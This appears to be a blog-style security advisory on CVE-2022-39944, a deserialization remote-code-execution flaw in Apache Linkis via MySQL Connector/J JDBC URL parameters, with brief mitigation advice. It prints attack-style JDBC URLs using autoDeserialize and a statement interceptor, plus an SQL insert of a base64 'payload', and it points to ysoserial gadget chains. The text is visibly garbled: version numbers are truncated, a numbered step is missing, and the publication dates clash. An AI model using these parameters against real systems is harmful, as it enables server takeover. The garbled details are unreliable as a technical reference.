CVE-2022-39944 - Remote Code Execution in Apache Linkis via MySQL Connector/J Deserialization Flaw

---

Published: 2024-06-24
Severity: High

Affected: Apache Linkis <= 1.2.

Apache Linkis is a powerful “computing middleware” often used in Big Data platforms to connect and manage different engines with a single interface. However, as with all complex systems, security is critical—especially when you connect to various data sources.

In 2022, a dangerous deserialization vulnerability was discovered in Linkis’s integration with the MySQL JDBC driver (Connector/J). It’s tracked as CVE-2022-39944 and can let an attacker who has write access to the target database perform *remote code execution* on the system.

This post will break down the issue, show how it happens, and offer guidance for both security researchers and system administrators.

What Is CVE-2022-39944?

In simple terms, Apache Linkis (up to version 1.2.) is vulnerable if it’s connected to a MySQL database using the MySQL Connector/J. When a user (or attacker) with the correct permissions sets up a JDBC Engine Connection (EC) and can write to the database, they can add *malicious parameters* into the JDBC URL. These can then trigger arbitrary code execution on the server Linkis runs on.

Put another way:
If the system trusts JDBC URL parameters without restrictions, attackers can smuggle in serialized Java payloads that get executed on your server.

Apache Linkis installations ≤ 1.2.

- Using MySQL Connector/J for database access
- Attackers have access to configure JDBC data sources with custom URLs and have table write permissions

NOTES:

How the Attack Works

The root issue is old, insecure handling of user-provided parameters in JDBC URLs, especially with MySQL's auto-deserialization options. This can be abused by putting a dangerous serialized Java gadget chain in a parameter like autoDeserialize=true and pointing to a location (like a remote server) hosting the attack payload.

*In code*, setting up a connection might look like this

String url = "jdbc:mysql://localhost:3306/db?autoDeserialize=true&userConfig=maliciousPayload";
Connection conn = DriverManager.getConnection(url, "user", "pass");

If Linkis lets users set or influence these parameters, and the driver trusts them, deserialization of dangerous objects can happen.

A simplified attack chain

1. Attacker creates and uploads a malicious serialized Java object to a location accessible by the database.

`

jdbc:mysql://dbhost/dbname?autoDeserialize=true&userConfig=serialized_payload

`

3. The MySQL Connector/J driver, on connecting, deserializes the payload.
4. The payload executes arbitrary Java code—possibly opening a shell or dropping a webshell on the server.

Here's a very high-level *example* (for educational purposes only)

-- Insert a payload into a writable table in the DB
INSERT INTO victim_table (data) VALUES ('rOABXNyABFqYXZhLnVaWwuUHJpbnRTdHJlYWkSW5mbyIAAAAAAAA3BwAAeHIAFGphdmEubGFuZy5kaXNwYXRjaGVyLk9iczAAAAAAABIAAHhxAH4AAw==');

In Linkis, configure JDBC parameters to

jdbc:mysql://dbhost/dbname?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

The real payload would use a gadget chain, such as CommonsCollections, created using tools like ysoserial.

See MySQL Connector/J security and ysoserial project for more reference about Java deserialization attacks.

The application passes user-controlled parameters into the JDBC URL.

- MySQL’s Connector/J before version 8..30 honors options like autoDeserialize=true.

References and More Reading

- Apache Linkis Security Advisories
- CVE-2022-39944 at NVD
- MySQL Connector/J Security Guide
- Deserialization Vulnerabilities Explained
- ysoserial (Java Deserialization Exploits)

Ensure only trusted users can set up or modify Engine Connections.

4. Use latest MySQL Connector/J

Final Thoughts

The power of Apache Linkis comes with great responsibility—especially when linking complex data sources. CVE-2022-39944 is a perfect example: even a single unfiltered parameter in a JDBC URL can open the door to remote code execution.

If you use Apache Linkis and MySQL, patch now! And always review user-provided configuration, even if your system doesn’t seem to be directly exposed to the public internet.


*This article is exclusive; content has been written in simple, clear language to help as many users as possible stay safe.*

For official updates and more info, check the Apache Linkis project home page and always follow your software vendor’s security mailing list.

Timeline

Published on: 10/26/2022 16:15:00 UTC
Last modified on: 10/28/2022 17:40:00 UTC